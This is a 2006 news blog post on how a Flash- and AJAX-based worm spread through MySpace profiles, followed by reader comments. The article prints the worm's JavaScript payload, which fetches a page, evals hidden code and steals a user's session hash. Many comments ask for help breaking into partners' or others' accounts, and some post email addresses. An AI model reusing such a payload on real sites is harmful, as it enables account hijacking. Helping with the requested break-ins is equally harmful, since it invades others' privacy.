Hacking MySpace: How Flash & AJAX Based Worm Works
By Angsuman Chakraborty, Gaea News NetworkTuesday, July 18, 2006
MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the U.S. government was behind the 9/11 terrorist attacks, Symantec warned Monday. However it may be just the tip of the iceberg. Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads.
The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. This can easily replicate Samy is my friend worm without breaking a sweat.
This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.
If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content. The impact would be much higher exposing even sensitive information on your hard-disk.
Let’s take a look at the worm, thanks to research by kinematic.theory:
When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript:
getURL("url“);
It opens and redirects you to the specified blog URL.
On this blog url there is another flash file embedded - “retrievecookie.swf”. It contains:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'https://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”);
It opens another blog post (link) and evaluates its contents.
This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace. Currently the code adds a message to your MySpace profile. It extensively use AJAX for its operations.
Tags: Iceberg
|
August 24, 2009: 6:50 pm
Wow, you people amaze ‘me’. “I MUST HACK MY LOVERS PAGE BECAUSE I DONT TRUST THEM”. I would guess that that insecurity right their and a fear you just can not stop thinking about, just made it happen. if not and they are, I dunno… common sense? Not what this is for, and not something people will not just ‘tell you’ how to do. I remember this when this happened. Also, if you are not smart enough in how to fix or reset your password, then I suggest going and taking your computer back to where ever you bought it. And tell them you are to stupid to own a computer and fail to read anything of important. Grow up. As for Flash on myspace. They still have a hole. Not as has as before. But still able to do some remote scripting with Flash and a PHP file on another host. Like what I am doing now im my profile. Linked by website in this post. Unfortunately they now disabled all getURL and any links embedded within flash. |
 jennifer |
June 15, 2009: 6:29 am
Well for everyone who has lost your password why not send in a salute to myspace if you are the owner of that account and tell them to change your email to your new one and pick a new pass. I had lost my account numbers of times for my ex, and a salute got me back my account. There really is no need to hack to get your account back. And for everyone trying to check up on theyre b/f g/f get a life and stop worring if they are cheating maybe they are. life goes on there is a reason why your not with them or that they are cheating figure it out for yourself and hire a detective its that simple then beating around the bush to hack into theyre account to find nothing! Hackers doesnt waste theyre time on that stuff they got better reasons to be hacking besides your relationship drama. |
 Angel |
June 6, 2009: 5:25 am
My brother’s myspace account was hacked and they changed everything, password and email, plus did this whole “gay pride” thing with the backgound and gender and all sorts of stuff. Well I want to make sure it doesn’t happen to me. Could you please email me some tips on how to avoid being hacked? I use Firefox for everything but my schoolwork, which I use IE6 cuz my school doesn’t seem to agree with Firefox. Please help me. webtreats@yahoo.com |
 henrie |
May 27, 2009: 3:30 pm
hey guyz if any of u out der knowz how to hack myspace…pls let me know…itz very urgent..pls tell me how if anyone knows… |
|
henrie |
May 27, 2009: 3:27 pm
hey if any of u out there knows how to hack myspace…pls tell me…i’v benn tryin 2 find that out for a long time……pls..if anyone knows.pls let me know.. |
 Leslie |
March 4, 2009: 8:11 am
I can’t remember my MySpace password. Can you help me? my email to login is lesliesnead@gamewood.net, but i no longer have access to that email address. my userid for myspace is lsnead. |
 mells |
March 4, 2009: 8:09 am
i need to hack onto my bfs myspace will i be able to do that without an email or password??? and im confused on how to hack a myspace. |
 droopz |
February 7, 2009: 5:16 am
can u please hack my myspace for me and send me the password because i think one of my friends hacked it and changed the password and now i cant get into it |
 LUIS |
July 19, 2008: 9:53 pm
NEED HELP WITH FIANCES MYSPACE PASSWORD HER USER NAME IS CHINADOLL@HOTMAIL.COM |
|
June 13, 2008: 3:27 am
[...] Looks like I will have to soon setup a complaint cell for Tata Indicom, BSNL, MySpace… [...] |
 i need help |
June 7, 2008: 1:08 pm
i need my gfs myspace hackd |
|
i need help |
 ryan |
June 7, 2008: 1:05 pm
some one help me hack into my girls myspaces and email me back with the password |
|
rj |
June 7, 2008: 1:04 pm
i need this myspace hacked could you get the password and email me back with it |
 Majishion |
May 21, 2008: 2:40 pm
someone help me get into this girls myspace pinoyboy07@msn.com mine is speed_limithm@yahoo.com |
 anna |
April 26, 2008: 2:55 pm
how do i look at one of my friends myspace messgaes i want to know how to read other people’s messages |
 jamie |
April 18, 2008: 1:25 am
i need help logging into an account,long story,lets just say i had the password,for got the password,and now need the password bad i have to meet sum1 in about 24 hours,so yea i need help getin into it they r tellin me where to meet them on there and it has to do with a funeral. |
 zak anwar |
February 1, 2008: 6:56 pm
hi thanks |
|
January 28, 2008: 7:44 pm
I forgot my password on myspace, and now i cant log in. Do u think u could hack my myspace and get it for me and email it to smile_glenda@hotmail.com The url is https://www.myspace.com/glenda_b and the email address i used to log in is asain_barbie3@yahoo.com thank you so much:) |
 Margaret. |
January 9, 2008: 4:04 pm
i want to know how to get into other peoples myspace messages. Please:) |
 STAMPED GURL |
December 28, 2007: 3:40 pm
I NEED HELP MA BF I THINK IS CHEATIN ON ME … WILL U HELP ME HACK HIS MYSPACE IF U HAVE A ANSWER PLEASE TYPE ME !! IM SO CRUSHED RIGHT NOW SOOO PLZ HELP ME SO THIS |
 Billy Bob |
December 24, 2007: 3:34 am
Im lazy ive circled the web on this issue. Iamreallybillgates@yahoo.com is a ghost i created today. I want to buy the myspace hash extractor or at least barter for it. I will do some slave work for u on the web or somethin. give me the link or somethin I have no excuse but after a few hours of circles my option is begging to buy it i dont need a hand out. Rape my email address i dont care just somebody send me a damn good link. I run mac so dont bother with mini pc bugs if its a zip. |
 kaila wake |
December 15, 2007: 5:31 pm
Hello, Thank you very much for your time* |
 jessica good |
 loser |
November 18, 2007: 1:40 am
Please help me read some1 else messages i need to get into there myspace nbox |
 dani |
 Jesse |
October 3, 2007: 10:13 pm
Say i share myspace with my better half, and she keeps deleting our mail before i can get a chance to read the account is in my name so you shouldn’t have any issues helpin me out. I’m lookin for a code that will make it impossible to delete my inbox mail? Until removing the code off coarse. |
 Jessy |
August 2, 2007: 5:53 pm
My boyfriend and I have kept getting into arguments because of people on myspace and we both decided to delete it. I deleted mine but he hasn’t deleted his. Is there anyway that you guys tell me how to hack into his myspace so he can learn what promises are?! thanks I would really appreciate it. |
|
July 10, 2007: 10:54 am
Someone hacked into my myspace.I think i no who it is. Can someone help me on how no hack into someones myspace.Thanks! MA aim sn is watunobotdat15 |
kiddoh:Dâ„